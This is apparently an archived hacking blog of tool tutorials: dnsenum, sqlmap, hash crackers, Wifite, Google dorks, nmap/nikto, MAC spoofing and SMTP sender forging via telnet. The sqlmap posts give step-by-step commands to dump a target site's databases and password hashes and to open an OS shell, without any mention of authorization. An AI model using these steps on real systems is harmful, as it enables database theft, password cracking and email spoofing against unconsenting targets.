Dnsenum is a perl script that can give us some informations about a server.
The program currently performs the following operations:
1) Get the host's addresse (A record).
2) Get the namservers (threaded).
3) Get the MX record (threaded).
4) Perform axfr queries on nameservers and get BIND versions(threaded).
5) Get extra names and subdomains via google scraping (google query = "allinurl: -www site:domain").
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7) Calculate C class domain network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9) Write to domain_ips.txt file ip-blocks.
You can download the lastest version of dnsenum from here
Now we need perl and Net/IP.pm , we can install Net/IP typing :
cpan -i NetAddr::IP
For more info about dnsenum typing : ./dnsenum -h
Syntax : ./dnsenum.pl [options] site
Options:
--dnsserver server : Use this DNS server for A, NS and MX queries.
--noreverse : Skip the reverse lookup operations.
--private : Show and save private ips at the end of the file domain_ips.txt.
--subfile file : Write all valid subdomains to this file.
-t value : The tcp and udp timeout values in seconds (default: 10s)
--threads value : The number of threads
-v : Be verbose: show all the progress and all the error messages.
-p value : Number of google search pages to process when scraping names (default 20)
-s value : The maximum number of subdomains that will be scraped from Google.
-f file : Read subdomains from this file to perform brute force.
-u a|g|r|z : Update the file specified with -f
a Update using all results.
g Update using only google scraping results.
r Update using only reverse lookup results.
z Update using only zonetransfer results.
-r : Recursion on subdomains, brute force all discovred subdomains that have an NS record.
-d value : maximum value of seconds to wait between whois queries, the value is defined randomly (default 3s)
-w : Perform the whois queries on c class network ranges.
-o file : Output in XML format.
Example :
./dnsenum.pl -s 100 --threads 5 -d 5 www.site.com
Ma of subdomains = 100
Number of threads = 5
Max value seconds to wait = 5
Target = www.site.com
./dnsenum.pl -s 100 -p 5 -o /home/HackForLulz/scan/dns www.site.com
Max of subdomains = 100
Max of google pages = 5
Oputput file = /home/HackForLulz/scan/dns
If you have any problem or if you need some explanations just write under this post!
Wednesday, December 5, 2012
Saturday, November 24, 2012
Sqlmap - Sqlinjection part 2
If you don't read Sqlmap - Sqlinjection part 1 click here.
Now we see an advanced options for sqlmap.
With -o we turn on all optimization switches
With --random-agent we can use a randomly selected http user-agent
With --ignore-proxy we ignore a default proxy of http (use --ignore-proxy only when sqlmap return some error)
With --level=level we change the level of test (default level=1, 1-5)
With --risk=risk we change risk of test (default risk=1, 0-3)
With --technique=technique we change technique of injection (default "beust")
We can find a current user of db using : --current-user
If we add --password we can dump hashes password : --current-user --password
With --dump-all we can dump all database
We can open a shell with --os-shell , or if we want use metasploit we can use :
--msf-path=/path/of/msf
We can use tor to proxy sqlmap with : --tor
If you have any problem or if you need some explanations just write under this post!
Now we see an advanced options for sqlmap.
With -o we turn on all optimization switches
With --random-agent we can use a randomly selected http user-agent
With --ignore-proxy we ignore a default proxy of http (use --ignore-proxy only when sqlmap return some error)
With --level=level we change the level of test (default level=1, 1-5)
With --risk=risk we change risk of test (default risk=1, 0-3)
With --technique=technique we change technique of injection (default "beust")
We can find a current user of db using : --current-user
If we add --password we can dump hashes password : --current-user --password
With --dump-all we can dump all database
We can open a shell with --os-shell , or if we want use metasploit we can use :
--msf-path=/path/of/msf
We can use tor to proxy sqlmap with : --tor
If you have any problem or if you need some explanations just write under this post!
Proxychains
Proxychains is a program that chains together different proxies and uses them on any program you want.
For example you can use proxychains for run metasploit with TOR (proxychains msfconsole) or using a vpn with TOR
You can install proxychains with : sudo apt-get install proxychains
If you use arch you can install from AUR
Now if you want, you can change your proxychains.conf , adding to [proxy list] a proxy that you want for example : socks5 127.0.0.1 9050 (for tor)
Now you can use proxychains with all program for example openvpn, nmap ecc..
If you have any problem or if you need some explanations just write under this post!
For example you can use proxychains for run metasploit with TOR (proxychains msfconsole) or using a vpn with TOR
You can install proxychains with : sudo apt-get install proxychains
If you use arch you can install from AUR
Now if you want, you can change your proxychains.conf , adding to [proxy list] a proxy that you want for example : socks5 127.0.0.1 9050 (for tor)
Now you can use proxychains with all program for example openvpn, nmap ecc..
If you have any problem or if you need some explanations just write under this post!
Monday, November 19, 2012
Hash Identifier
Do you have some hash to decrypt (see last article) but you don't know what kind of hash is it ?
So you can use a python script called Hash Identifier for know what kind of hash it is.
You can download Hash Identifier from here.
Encryption formats supported: ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…
For run this script you need python, after move into directory (cd ..) and digit:
./Hash_ID.py
Now we must put our hash , wait a moment .. Now we know what kind of hash is our hash !
If you have any problem or if you need some explanations just write under this post!
So you can use a python script called Hash Identifier for know what kind of hash it is.
You can download Hash Identifier from here.
Encryption formats supported: ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…
For run this script you need python, after move into directory (cd ..) and digit:
./Hash_ID.py
Now we must put our hash , wait a moment .. Now we know what kind of hash is our hash !
If you have any problem or if you need some explanations just write under this post!
Saturday, November 10, 2012
Sqlmap - Sqlinjection part 1
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
You can download sqlmap from here
After download extract sqlmap.
Move into directory (cd sqlmap)
For run sqlmap we need python 2.6 or python 2.7; you can download python from official website.
For more info about sqlmap click here
First we need a url to analize, for example www.website.com/pag.php?id=4
Now we can analize this url with sqlmap :
./sqlmap.py -u "www.website.com/pag.php?id=4"
If parameter is injectable (in this case parameter is id) we can see a list of databases adding --dbs.
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
After we can see a list of tables that are content in one databases adding --tables
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
After we can see a list of columns that are content in one table adding --columns
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you're interested about the contents you can dump the database with --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (so you dump all tables in database)
If you have any problem or if you need some explanations just write under this post!
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
You can download sqlmap from here
After download extract sqlmap.
Move into directory (cd sqlmap)
For run sqlmap we need python 2.6 or python 2.7; you can download python from official website.
For more info about sqlmap click here
START
First we need a url to analize, for example www.website.com/pag.php?id=4
Now we can analize this url with sqlmap :
./sqlmap.py -u "www.website.com/pag.php?id=4"
If parameter is injectable (in this case parameter is id) we can see a list of databases adding --dbs.
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
After we can see a list of tables that are content in one databases adding --tables
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
After we can see a list of columns that are content in one table adding --columns
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you're interested about the contents you can dump the database with --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (so you dump all tables in database)
If you have any problem or if you need some explanations just write under this post!
Thursday, November 8, 2012
Findmyhash - Crack hash
Findmyhash is a python scritp for crack hash string.
You can download this script from here
Findmyhash supports :
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
OPTIONS
-h hash_value: If you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: If you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g : if your hash cannot be cracked, search it in Google and show all the results.
FOR MORE INFO VISIT : http://code.google.com/p/findmyhash/
If you want know what kind of hash is yours check this article
If you have any problem or you need some explanations just write under this post !
You can download this script from here
Findmyhash supports :
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
OPTIONS
-h hash_value: If you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: If you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g : if your hash cannot be cracked, search it in Google and show all the results.
FOR MORE INFO VISIT : http://code.google.com/p/findmyhash/
If you want know what kind of hash is yours check this article
If you have any problem or you need some explanations just write under this post !
Thursday, November 1, 2012
Nessus - Server Scan
In computer security, Nessus is a proprietary comprehensive vulnerability scanning program.
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download nessus from official website, click here
Now you must obtain an activation code from here.
Now you must activate your code :
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start nessus' deamon :
Move into directory : /opt/nessus/sbin
sudo ./nessusd
Now we must add an user:
sudo /opt/nessus/sbin/nessus-adduser
Now we can start nessus ! Open our browser and go to : https://localhost:8834
If you have any problem or you need some explanations just write under this post !
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download nessus from official website, click here
Now you must obtain an activation code from here.
Now you must activate your code :
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start nessus' deamon :
Move into directory : /opt/nessus/sbin
sudo ./nessusd
Now we must add an user:
sudo /opt/nessus/sbin/nessus-adduser
Now we can start nessus ! Open our browser and go to : https://localhost:8834
If you have any problem or you need some explanations just write under this post !
Sunday, October 28, 2012
Wifite - Crack WiFi
Wifite is a automated wirless auditor written in python.
You can download wifite from here
This script work only on linux system not in windows or OSx.
You need python 2.6 or 2.7 for run this script.
You need wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched.
You need aircrack-ng suite.
For run move into directory (cd..) and digits:
python wifite.py
For more information digits :
python wifite.py -help
p.s : for run this script you need root access !
If you have any problem or you need some explanations just write under this post !
You can download wifite from here
This script work only on linux system not in windows or OSx.
You need python 2.6 or 2.7 for run this script.
You need wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched.
You need aircrack-ng suite.
For run move into directory (cd..) and digits:
python wifite.py
For more information digits :
python wifite.py -help
p.s : for run this script you need root access !
If you have any problem or you need some explanations just write under this post !
Wednesday, October 10, 2012
Whatweb
What web is a tool for web application analysis written by Andrew Horton in 2009.
Firstable we install Ruby (linux):
sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8
After we install some dipendences of ruby :
sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet
Now download whatweb from here
For run whatweb move in to directory (cd ..) and digits ./whatweb
Now you can see the help of whatweb. Whatweb have more than 900 plugins.
Whatweb have 4 levels of "aggression":
passive : Make a single request on the target except redirect.
empty
aggressive: performs a thorough scan of target.
heavy: greater depth of the third level
For make a scan digits :
./whatweb –aggression=3 www.site.com
For more details see the help of whatweb!
If you have any problem or you need some explanations just write under this post !
Install:
Firstable we install Ruby (linux):
sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8
After we install some dipendences of ruby :
sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet
Now download whatweb from here
Run
For run whatweb move in to directory (cd ..) and digits ./whatweb
Now you can see the help of whatweb. Whatweb have more than 900 plugins.
Whatweb have 4 levels of "aggression":
passive : Make a single request on the target except redirect.
empty
aggressive: performs a thorough scan of target.
heavy: greater depth of the third level
For make a scan digits :
./whatweb –aggression=3 www.site.com
For more details see the help of whatweb!
If you have any problem or you need some explanations just write under this post !
Tuesday, October 2, 2012
How to crack hashed password using google
Hashing is not the same of Crypting. Crypting is bidirectional and hashing is unidiretional.
Crypting : Crypt <----> Decrypt
Hashing : Decrypt ----> Crypt
We can decrypt hashed passowrd using google with a python script called Gcrack.
You can download Gcrack from here
Gcrack allows to decrypt more than one passowrd at the same time.
For run Gcrack we need python compiler, i reccomend you python 2.7
Now move into directory (cd ..)
Digits: python gcrack.py pass.txt
pass.txt is the route where are the lists of passwords to decrypt.
If you have any problem or you need some explanations just write under this post !
Crypting : Crypt <----> Decrypt
Hashing : Decrypt ----> Crypt
We can decrypt hashed passowrd using google with a python script called Gcrack.
You can download Gcrack from here
Gcrack allows to decrypt more than one passowrd at the same time.
For run Gcrack we need python compiler, i reccomend you python 2.7
Now move into directory (cd ..)
Digits: python gcrack.py pass.txt
pass.txt is the route where are the lists of passwords to decrypt.
If you have any problem or you need some explanations just write under this post !
Thursday, September 27, 2012
How to visit .onion website
Today i want show you how surf on onion website a part of the Deep Web.
I write what say wikipedia about Deep Web:
The Deep Web is World Wide Web content that is not part of the Surface Web, which is indexable by standard search engines like Google.
It should not be confused with the dark Internet, the computers that can no longer be reached via Internet, or with the distributed filesharing network Darknet, which could be classified as a smaller part of the Deep Web.
We can visit the onion website only using tor. Yuo can see how install tor here.
On onion website we can find what is illegal for traditional website.
In most cases we must know the url of website that it is composed to a string of words and numbers .onion
But there is some search engine, the most popular is torch !
We can visit torch copying this url : xmh57jrzrnw6insl.onion or click here. Other search engine is Deep Search, but Deep Search returns only the first ten pages.
At the moment Deep Search is offline but maybe it will return ! You can visit Deep Search copying this url : xycpusearchon2mc.onion or click here.
Other search engine is Onioon. Onioon can be expanded by its users.
You can visit Onioon copying this url : dts563ge5y7c2ika.onion or click here.
For other information about onion website you can visit Hidden Wiki copying this url : 7jguhsfwruviatqe.onion or click here.
If you have any problem or you need some explanations just write under this post !
I write what say wikipedia about Deep Web:
The Deep Web is World Wide Web content that is not part of the Surface Web, which is indexable by standard search engines like Google.
It should not be confused with the dark Internet, the computers that can no longer be reached via Internet, or with the distributed filesharing network Darknet, which could be classified as a smaller part of the Deep Web.
We can visit the onion website only using tor. Yuo can see how install tor here.
On onion website we can find what is illegal for traditional website.
In most cases we must know the url of website that it is composed to a string of words and numbers .onion
But there is some search engine, the most popular is torch !
We can visit torch copying this url : xmh57jrzrnw6insl.onion or click here. Other search engine is Deep Search, but Deep Search returns only the first ten pages.
At the moment Deep Search is offline but maybe it will return ! You can visit Deep Search copying this url : xycpusearchon2mc.onion or click here.
Other search engine is Onioon. Onioon can be expanded by its users.
You can visit Onioon copying this url : dts563ge5y7c2ika.onion or click here.
For other information about onion website you can visit Hidden Wiki copying this url : 7jguhsfwruviatqe.onion or click here.
If you have any problem or you need some explanations just write under this post !
Monday, September 17, 2012
Google Dorks
Google is the most popular search engine.
Through google dork allows us to find all your private documents, passwords lists, emails, etc...
For use the dork we just wirte after one "code":
For example if we want search all address of www.sito.it we do:
site:www.sito.it
Site: restricts results to a domain
intitle: restricts result to website that contain a specific word in title
allintitle: restricts result to website that contan a specific words in title
With intitle we can search one word that is in title of website, instead with allintitle we can search two or more words that is in title of website.
filetype: restricts result to type of fyle that we are searching
link: restricts result to website that have the same link, es, link:hackforlulz.blogspot.it
allintext:restricts result to web page that contein the same text
define:describe term and related link
related:search similar webpage
info: provides information and links to a specific url
With * we not defined a specific word, es : site: *.aspx
With this we search all site in aspx.
For a list of dork that we can use to search vulnerabilities click here
I don't say you that with google dork you can hack wesites, only that if you use rightly the google dorks you can find a lot of private documents and so find passwords, emails ec..
If you have any problem or you need some explanations just write under this post !
Through google dork allows us to find all your private documents, passwords lists, emails, etc...
For use the dork we just wirte after one "code":
For example if we want search all address of www.sito.it we do:
site:www.sito.it
Site: restricts results to a domain
intitle: restricts result to website that contain a specific word in title
allintitle: restricts result to website that contan a specific words in title
With intitle we can search one word that is in title of website, instead with allintitle we can search two or more words that is in title of website.
filetype: restricts result to type of fyle that we are searching
link: restricts result to website that have the same link, es, link:hackforlulz.blogspot.it
allintext:restricts result to web page that contein the same text
define:describe term and related link
related:search similar webpage
info: provides information and links to a specific url
With * we not defined a specific word, es : site: *.aspx
With this we search all site in aspx.
For a list of dork that we can use to search vulnerabilities click here
I don't say you that with google dork you can hack wesites, only that if you use rightly the google dorks you can find a lot of private documents and so find passwords, emails ec..
If you have any problem or you need some explanations just write under this post !
Thursday, September 6, 2012
How to send anonymous email
There are a lot of web site that allow to send anonymous mail. But i want present you a tool that allow to send anonymous mail without any browser.
We use mixmaster, the most popular program that lets you send anonymous emails through remailer type II and beyond.
For use mixmaster if you use a firewall you must unlocked port 25 (SMTP).
To default mixmaster send email with sendmail. I recommend to install sendmail else you can edit mix.cfg
In some distro you can just find mixmaster in repository, but if you want install from source code you can download the archive from here
Extract the archive and move in directory, launch the install script.
Answer the question , but when it ask you - Do you want to set up a remailer? - answer NO.
Now we install the library openssl and ncurses. For start mixmaster move in to directory and digits : ./mixmaster
Will be open a window, aftre for send a message digits - m -
Now we write the email address and the subject. After digits e for write the message.
For write a message we must use text editor Vim. After write the message press SHITT+Q and digits exit.
To choose a chain of remailers just type the key - c - there you will see a list of all the available remailers.
Before choosing remailers should check its status. To check the status of remailers click here or digits - u - in mixmaster's window and press - * - now will do the update.
For send email digits - m - and after digits - s -
It may happen that some mail is lost. If you choose a chain of 3-4 remailers it may happen that email will arrive after 1-2 days.
In windows we can use telnet for send anonymous mail.
Firstable we choice the SMTP server for send email, for list click here
Now digits : open nameserver port , es : open pop.tiscali.it 25
When the connection is established digits : helo hostname
After digits : 250 nameserver , we start to send email.
With : mail from: mail@address.com we set the sender
With : rctp to: mail@address.com we set the recipient
Digits data to start write the message. When you finish digits twice enter after digits dot (.) and after again enter.
So you send the mail , now for exit digits : quit
We can use tenlent also in Linux but i prefer mixmaster !
If you have a problem or you need some explanations just write under this post!
Linux
We use mixmaster, the most popular program that lets you send anonymous emails through remailer type II and beyond.
For use mixmaster if you use a firewall you must unlocked port 25 (SMTP).
To default mixmaster send email with sendmail. I recommend to install sendmail else you can edit mix.cfg
In some distro you can just find mixmaster in repository, but if you want install from source code you can download the archive from here
Extract the archive and move in directory, launch the install script.
Answer the question , but when it ask you - Do you want to set up a remailer? - answer NO.
Now we install the library openssl and ncurses. For start mixmaster move in to directory and digits : ./mixmaster
Will be open a window, aftre for send a message digits - m -
Now we write the email address and the subject. After digits e for write the message.
For write a message we must use text editor Vim. After write the message press SHITT+Q and digits exit.
To choose a chain of remailers just type the key - c - there you will see a list of all the available remailers.
Before choosing remailers should check its status. To check the status of remailers click here or digits - u - in mixmaster's window and press - * - now will do the update.
For send email digits - m - and after digits - s -
It may happen that some mail is lost. If you choose a chain of 3-4 remailers it may happen that email will arrive after 1-2 days.
Windows or Mac OSX
In windows we can use telnet for send anonymous mail.
Firstable we choice the SMTP server for send email, for list click here
Now digits : open nameserver port , es : open pop.tiscali.it 25
When the connection is established digits : helo hostname
After digits : 250 nameserver , we start to send email.
With : mail from: mail@address.com we set the sender
With : rctp to: mail@address.com we set the recipient
Digits data to start write the message. When you finish digits twice enter after digits dot (.) and after again enter.
So you send the mail , now for exit digits : quit
We can use tenlent also in Linux but i prefer mixmaster !
If you have a problem or you need some explanations just write under this post!
Saturday, September 1, 2012
Let's scan a server
To scan a server we can use a lot of tools like nmap.
You can find a lot of tools with his description here
In this article we'll see in details scan tools like nmap , nikto , load balancer detector and halberd
Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a "map" of the network.
To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.
You can donwload nmap from here, nmap works on linux , BSD , soalris, windows and macosx.
In some distro we can find nmap in official repository, then we can install nmap only digits in terminal : sudo apt-get install nmap.
Else we must downlaod nmap.bz2 from here.
After donwload we must extract file from bz2. Move on directory (with cd) where there is the archive just download:
tar -jxvf name archive
cd nmap
./configure
make
sudo make install
In windows you only need to install the exe. You can download the executable from here
Firstable we must donwlaod nmap
Double click on file just donwloaded.
Double click on nmap-
Follow the instructions in the installer.
For more detail to install : Windows , Mac OSX
Now we can use nmap to command line. Nmap have a gui called Zenmap, but we see how to use nmap in command line.
Nmap have a lot of options, we can see all : nmap -help
-sS --> TCP syn scan
-sU --> UDP port scan
-F --> Fast scan (limited port)
-O --> OS detection
-A --> Enable OS detection, version detection, script scanning, and traceroute
-p --> To set port
nmap -sS -A -p 25-30 127.0.0.1
TCP syn scan from port 25 to 30 with os detection , version detection , script scanninc and tracerout.
Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other problems.
It performs generic and server type specific checks. It also captures and prints any cookies received.
You can donwload nikto from here
Nikto is a perl script then we need perl. On unix system is pre-installed.
You can downlaod perl from here
We move to directory where si nikto.pl.To start nikto :
perl nikto.pl -h ip
For more details : perl nikto.pl -help
Load balancer detector is a bash script.
You can download the script from here
To start script move on directory where is lbd.sh
For start this script we need root (sudo).
./lbd.sh www.sito.it
Halberd is python script, you can download from here
We need python 2.4 or above to install halberd.
Extrack archive, move into new directory and digits:
python setup.py install
Now we have install halberd. To start halberd digits:
halberd www.sito.it
For more details digits : halberd -h
If you have a problem or you need some explanations just write under this post!
You can find a lot of tools with his description here
In this article we'll see in details scan tools like nmap , nikto , load balancer detector and halberd
Nmap
Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a "map" of the network.
To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.
You can donwload nmap from here, nmap works on linux , BSD , soalris, windows and macosx.
In Linxu/BSD/solaris
In some distro we can find nmap in official repository, then we can install nmap only digits in terminal : sudo apt-get install nmap.
Else we must downlaod nmap.bz2 from here.
After donwload we must extract file from bz2. Move on directory (with cd) where there is the archive just download:
tar -jxvf name archive
cd nmap
./configure
make
sudo make install
Windows
In windows you only need to install the exe. You can download the executable from here
Mac OSX
Firstable we must donwlaod nmap
Double click on file just donwloaded.
Double click on nmap-
Follow the instructions in the installer.
For more detail to install : Windows , Mac OSX
Now we can use nmap to command line. Nmap have a gui called Zenmap, but we see how to use nmap in command line.
Nmap have a lot of options, we can see all : nmap -help
-sS --> TCP syn scan
-sU --> UDP port scan
-F --> Fast scan (limited port)
-O --> OS detection
-A --> Enable OS detection, version detection, script scanning, and traceroute
-p --> To set port
nmap -sS -A -p 25-30 127.0.0.1
TCP syn scan from port 25 to 30 with os detection , version detection , script scanninc and tracerout.
Nikto
Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other problems.
It performs generic and server type specific checks. It also captures and prints any cookies received.
You can donwload nikto from here
Nikto is a perl script then we need perl. On unix system is pre-installed.
You can downlaod perl from here
We move to directory where si nikto.pl.To start nikto :
perl nikto.pl -h ip
For more details : perl nikto.pl -help
Load balancer detector
Load balancer detector is a bash script.
You can download the script from here
To start script move on directory where is lbd.sh
For start this script we need root (sudo).
./lbd.sh www.sito.it
Halberd
Halberd is python script, you can download from here
We need python 2.4 or above to install halberd.
Extrack archive, move into new directory and digits:
python setup.py install
Now we have install halberd. To start halberd digits:
halberd www.sito.it
For more details digits : halberd -h
If you have a problem or you need some explanations just write under this post!
Thursday, August 23, 2012
How to change Mac Address on Linux , Windows and OSX system
MAC address is a unique identifier assigned to network interfaces for communications on the physical network segment.
MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet.
The standard (IEEE 802) format for printing MAC-48 addresses in human-friendly form is six groups of two hexadecimal digits.
In linux system we can use terminal:
For find our mac address we can digit : ifconfig
Firtstable we must down the interface :
ifconfig eth0 down
After we change our mac address:
ifconfig eth0 hw ether new mac address
ex: ifconfig eth0 hw ether AA:BB:CC:DD:EE:FF
After we must up the interface:
ifconfig eth0 up
Now your mac address is changed !
If you use wifi interface your interface is wlan0 not eth0.
When you restart your pc, mac address return the first !
Alternatively you can try macchanger : sudo apt-get install macchanger macchanger-gtk
Start macchanger : macchanger-gtk
On windows system we need program, Mac Makeup. You can download this program here.
Now you can select interface that you want change mac address.
Now choice Generate random and after click on Change. Now your mac address is changed !
On OSX system we need program like windows , MacDaddy.
You can download MacDaddy here.
MacDaddy can choice mac address of productor or random.
When you change your mac address you must only restart your pc , and your mac address id changed !
If you have a problem or you need some explanations just write under this post!
MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet.
The standard (IEEE 802) format for printing MAC-48 addresses in human-friendly form is six groups of two hexadecimal digits.
In linux system we can use terminal:
For find our mac address we can digit : ifconfig
Firtstable we must down the interface :
ifconfig eth0 down
After we change our mac address:
ifconfig eth0 hw ether new mac address
ex: ifconfig eth0 hw ether AA:BB:CC:DD:EE:FF
After we must up the interface:
ifconfig eth0 up
Now your mac address is changed !
If you use wifi interface your interface is wlan0 not eth0.
When you restart your pc, mac address return the first !
Alternatively you can try macchanger : sudo apt-get install macchanger macchanger-gtk
Start macchanger : macchanger-gtk
On windows system we need program, Mac Makeup. You can download this program here.
Now you can select interface that you want change mac address.
Now choice Generate random and after click on Change. Now your mac address is changed !
On OSX system we need program like windows , MacDaddy.
You can download MacDaddy here.
MacDaddy can choice mac address of productor or random.
When you change your mac address you must only restart your pc , and your mac address id changed !
If you have a problem or you need some explanations just write under this post!
Subscribe to:
Posts (Atom)